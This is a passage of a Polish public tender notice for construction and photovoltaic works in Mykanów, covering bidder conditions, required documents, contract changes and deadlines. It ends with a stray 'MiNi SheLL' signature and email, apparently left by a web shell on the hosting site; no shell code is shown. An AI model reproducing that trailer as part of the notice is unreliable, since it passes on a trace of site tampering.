m2 wraz z instalacjami wodkan.<br/>i instalacją elektryczną a drugiej roboty polegającej na budowie instalacji<br/>fotowoltaicznej o mocy minimum 6,0 kWp<br/>Uwaga<br/>Zamawiający dopuszcza, że w przypadku, gdy ofertę składają wykonawcy wspólnie ubiegający<br/>się o zamówienie, to warunek ten powinien spełniać ten podmiot, który w ramach wewnętrznego<br/>podziału zadań zrealizuje tę cześć zamówienia, z którą wiąże się posiadanie konkretnego<br/>doświadczenia, kwalifikacji.<br/>W przypadku, gdy wykonawca nabył doświadczenie przy realiazacji zamówienia, jako członek<br/>konsorcjum, winien wykazać, że bezpośrednio wykonywał tę część zamówienia, która<br/>odpowiadała zakresowi określonemu przez Zamawiającego.<br/>W przypadku posługiwania się przez wykonawcę cudzym potencjałem, wykonawcy mogą polegać<br/>na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonują roboty<br/>budowlane lub usługi, do realizacji, których te zdolności są wymagane.<br/>b) Zasoby ludzkie zdolne do realizacji przedmiotu zamówienia:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub<br/>będzie dysponował osobami zdolnymi do wykonania zamówienia, w tym, co najmniej 1<br/>osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia<br/>budowlane, które zostały wydane na podstawie obowiązujących przepisów,<br/>przewidzianą na stanowisko kierownika budowy;<br/>Uwagi:<br/> Uprawnienia budowlane, o których mowa powyżej powinny być zgodne z ustawą z dnia<br/>7 lipca 1994 r. Prawo budowlane lub odpowiadające im ważne uprawnienia wydane na<br/>podstawie wcześniej obowiązujących przepisów upoważniające do kierowania robotami<br/>budowlanymi w zakresie objętym niniejszym zamówieniem,  Zgodnie z art. 12a<br/>ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone<br/>w art. 12 ust. 1 ustawy mogą również wykonywać przez osoby, których odpowiednie<br/>kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach<br/>odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o<br/>zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich<br/>Unii Europejskiej (tj. Dz. U. z 2020 r., poz. 220). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu<br/>należy przedłożyć:<br/>- wykaz robót budowlanych – załącznik nr 5 ( warunek zostanie uznany za spełniony,<br/>jeżeli wykonawca przedstawi podpisany przez osobę uprawnioną wykaz robót budowlanych,<br/>wykonanych nie wcześniej niż w okresie ostatnich pięciu lat prze upływem terminu składania<br/>ofert a jeżeli okres działalności jest krótszy- w tym okresie wraz z podaniem ich rodzaju i<br/>wartości, daty, miejsca wykonania i podmiotów na rzecz, których roboty te zostały wykonane<br/>z załaczeniem dowodów określających czy te roboty budowlane zostały wykonane nalezycie,<br/>w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje<br/>bądź inne dokumenty wystawione przez podmiot, na rzecz, którego roboty budowlane były<br/>wykonane, a jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest<br/>w stanie uzyskać tych dokumentów – inne dokumenty, lub potwierdzenie wykonania roboty<br/>budowlanej<br/>- wykaz osób ( na potwierdzenie spełnienia warunku należy przedstawić wykaz osób<br/>skierowanych do realizacji zamówienia, w szczególności odpowiedzialnych za kierowanie<br/>robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie<br/>do dysponowania tymi osobami podpisany przez osobę uprawniona sporządzony na<br/>podstawie załącznika nr 6<br/>- dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę<br/>gwarancyjną nie mniejszą niż 500 000, 00 ( np. polisa ubezpieczeniowa opłacona).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty, w celu wstępnego wykazania spełniania warunków udziału w postępowaniu<br/>oraz braku podstaw do wykluczenia, Wykonawca zobowiązany jest dołączyć aktualne<br/>na dzień składania ofert:<br/>1) oświadczenie dotyczące przesłanek wykluczenia z postępowania ( oświadczenie<br/>należy wypełnić i podpisać przez osoby( osobę) uprawnioną - załącznik nr 2<br/>2) oświadczenie dotyczące spełniania warunków udziału w postępowaniu (<br/>oświadczenie wypełnić i podpisać przez osoby(osobę) uprawniona – załącznik nr 3<br/>3) klauzula informacyjna RODO - oświadczenie składane na druku oferty<br/>4) Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej lub innego właściwego rejestru (jeżeli<br/>dotyczy) - w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest<br/>umocowana do jego reprezentowania, sporządzone nie wcześniej niż 3 miesiące<br/>przed ich złożeniem. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza<br/>terytorium Rzeczypospolitej Polskiej, zamiast w/w dokumentów składa dokument<br/>lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub<br/>miejsce zamieszkania,<br/>5) pełnomocnictwo z art.58 ust.2 ustawy, – Pzp ( jeśli dotyczy)<br/>Wykonawcy ubiegający się wspólnie o udzielenie zamówienia przedkładają<br/>pełnomocnictwo do reprezentowania ich zgodnie z art.58 ust.2 ustawy Pzp.<br/>Pełnomocnictwo powinno być załączone do oferty w formie oryginału. Jeżeli<br/>dokument został sporządzony w postaci papierowej i opatrzony własnoręcznym<br/>podpisem, Wykonawca przekazuje cyfrowe odwzorowanie tego dokumentu opatrzone<br/>kwalifikowanym podpisem elektronicznym lub podpisem zaufany lub podpisem<br/>osobistym poświadczającym zgodność odwzorowania z dokumentem w postaci<br/>papierowej. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu<br/>poświadczonej za zgodność z oryginałem przez notariusza tj. podpisanej<br/>kwalifikowanym podpisem elektronicznym lub podpisem zaufany lub podpisem<br/>osobistym osoby posiadającej uprawnienia notariusza<br/>6) pełnomocnictwo dla osoby / osób podpisującej ofertę – pełnomocnictwo dla<br/>osoby/ osób podpisującej ofertę, jeżeli nie figurują one w odpisie z właściwego<br/>rejestru. Pełnomocnictwo powinno być złożone w formie oryginału<br/>7) Wykaz rozwiązań równoważnych – ( jeśli dotyczy) wykonawca, który powołuje<br/>się na rozwiązania równoważne , jest zobowiązany wykazać,ze oferowane przez niego<br/>rozwiązanie spełnia wymagania określone przez zamawiającego. W takim przypadku<br/>wykonawca załącza do oferty wykaz rozwiązań równoważnych z jego opisem i<br/>normami. Dokument musi być złożony w formie elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym lub podpisem zaufany lub podpisem<br/>osobistym osoby upoważnionej do reprezentacji<br/>8) zastrzeżenie tajemnicy przedsiębiorstwa – w sytuacji, gdy oferta lub inne<br/>dokumenty składane w toku postępowania będą zawierały tajemnicę przedsiębiorstwa,<br/>wykonawca wraz z przekazaniem takich informacji, zastrzega, że nie mogą być one<br/>udostępniane, oraz wykazuje, że zastrzeżone informacje stanowią tajemnicę<br/>przedsiębiorstwa w rozumieniu przepisów ustawy z 16 kwietnia 1993r. o zwalczaniu<br/>nieuczciwej konkurencji. Nie można zastrzec informacji, o których mowa w art.222<br/>ust.5 ustawy Pzp. Jeśli oferta zawiera dokumenty, co których wykonawca zastrzegł, że<br/>nie mogą być ujawnione- wówczas oferta powinna być sporządzona w sposób<br/>umożliwiający Zamawiającemu udostępnienie dokumentów ( z wyjątkiem określonych<br/>w art.18 ust.3 ustawy Pzp) wszystkim zainteresowanym. Dokument musi być złożony<br/>w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub<br/>podpisem zaufany lub podpisem osobistym osoby upoważnionej do reprezentacji<br/>9) zobowiązanie podmiotu udostępniającego zasoby ( w przypadku, gdy wykonawca<br/>polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby) w takim<br/>przypadku należy również złożyć oświadczenie podmiotu udostępniającego o braku<br/>podstaw do wykluczenia oraz o spełnieniu warunków <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia ( konsorcja, spółki cywilne), dokumenty lub oświadczenia potwierdzające brak<br/>podstaw do wykluczeniu oraz oświadczenie o spełnianiu warunków udziału w postępowaniu<br/>składa każdy z wykonawców oddzielnie, również podmiot udostępniający swoje zasoby<br/>składa te dokumenty. Ponadto wykonawcy wspólnie ubiegający się (konsorcja, spółki<br/>cywilne) mają obowiązek złożyć zgodnie z art.117 ust.4 ustawy Pzp oświadczenie, z<br/>którego wynika, które roboty budowlane, dostawy lub usługi wykonują poszczególni z<br/>nich. Oświadczenie należy złożyć wraz z ofertą opatrzone kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub osobistym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje, na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp, możliwość dokonywania<br/>zmian postanowień niniejszej umowy, w zakresie:<br/>1) zmiany terminu realizacji, w przypadku:<br/>a) z brakiem możliwości prowadzenia robót na skutek obiektywnych warunków<br/>klimatycznych lub;<br/>d) działaniem siły wyższej w rozumieniu przepisów k.c.;<br/>e) nieterminowym, z przyczyn niezależnych od wykonawcy, przekazaniem przez<br/>Zamawiającego terenu budowy Wykonawcy, lub ;<br/>f) wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezawinionych<br/>przez Wykonawcę , lub ;<br/>g) innymi okolicznościami niepowstałymi z winy Wykonawcy, lub<br/>h) wykopalisk uniemożliwiających wykonywanie robót ;<br/>i) konieczność zlecenia wykonania dodatkowych robót budowlanych, których<br/>wykonanie ma wpływ na termin realizacji robót objętych zamówieniem<br/>podstawowym.<br/>2. Podstawą dokonania zmian, o których mowa w ust. 1 pkt 1, będzie potwierdzenie w dokumentacji<br/>budowy, przez inspektora nadzoru, wystąpienia opisanych okoliczności uzasadniających<br/>wstrzymanie robót, z określeniem okresu wstrzymania robót wpływającego na<br/>zmianę terminu i sporządzenie protokołu konieczności – zatwierdzonego przez zamawiającego.<br/>3. Zmiana umowy może nastąpić także w przypadkach, o których mowa w art. 455 ustawy<br/>Pzp oraz w razie zaistnienia okoliczności / przesłanek, o których mowa w art.15r ustawy z<br/>dnia 2 marca 2020r. o szczególnych rozwiązaniach związanych z zapobieganiem,<br/>przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz<br/>wywołanych nimi sytuacji kryzysowych.<br/>4.Zmiany umowy wymagają zachowania formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-27 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/mykanow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-27 11:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wszelkie dodatkowe informacje zawarte są w SWZ i załącznikach

Creat By MiNi SheLL
Email: jattceo@gmail.com